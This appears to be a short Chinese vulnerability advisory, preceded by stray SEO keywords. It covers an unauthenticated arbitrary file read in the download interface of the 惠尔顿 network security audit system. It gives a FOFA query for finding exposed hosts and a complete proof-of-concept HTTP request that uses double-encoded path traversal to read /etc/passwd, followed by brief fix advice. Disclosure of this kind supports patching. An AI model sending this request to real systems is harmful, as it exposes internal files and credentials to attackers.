php 学院网站,小程序在线制作平台,红色大气网站模板,wordpress eaccelerator0x01 产品简介
惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求#xff0c;规范网络行为#xff0c;满足国家的规范#xff1b;支持1-3线路的internet接入、1-3对网桥#xff1b;含强大的上网行为管理、审计、监控模块#xff1b…0x01 产品简介
惠尔顿网络安全审计产品致力于满足军工四证、军工保密室建设、国家涉密网络建设的审计要求规范网络行为满足国家的规范支持1-3线路的internet接入、1-3对网桥含强大的上网行为管理、审计、监控模块用户访问功能内容过滤功能流量控制功能、带宽管理功能增强的应用安全扩展强大的应用协议分析与报表功能。
0x02 漏洞概述
惠尔顿 网络安全审计系统download接口存在任意文件读取漏洞未经身份验证的攻击者可利用此漏洞读取系统内部敏感文件及凭证使系统处于极不安全的状态。
0x03 影响范围
version v10
0x04 复现环境
FOFAapp惠尔顿-网络安全审计系统 0x05 漏洞复现
PoC
GET /download/..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
读取 /etc/passwd 文件 0x06 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
